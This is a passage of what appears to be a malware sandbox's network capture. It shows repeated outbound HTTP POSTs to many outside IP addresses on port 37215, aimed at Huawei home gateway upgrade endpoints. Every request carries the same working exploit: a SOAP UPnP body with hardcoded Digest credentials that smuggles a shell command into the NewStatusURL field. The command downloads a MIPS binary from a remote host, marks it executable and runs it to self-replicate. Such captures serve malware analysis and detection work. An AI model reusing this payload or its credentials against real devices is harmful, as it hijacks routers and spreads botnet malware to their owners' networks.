                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1090192.168.2.135583041.27.215.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432604074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1091192.168.2.134181241.191.106.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.432630062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1092192.168.2.1353910157.205.198.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433353901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1093192.168.2.133847041.145.33.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433361053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1094192.168.2.1346594133.39.142.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433393002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1095192.168.2.1348324221.109.88.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433397055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1096192.168.2.133772236.0.119.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433413029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1097192.168.2.1347030197.198.114.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433414936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1098192.168.2.1339146157.61.115.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433427095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1099192.168.2.1335742165.191.98.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433428049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 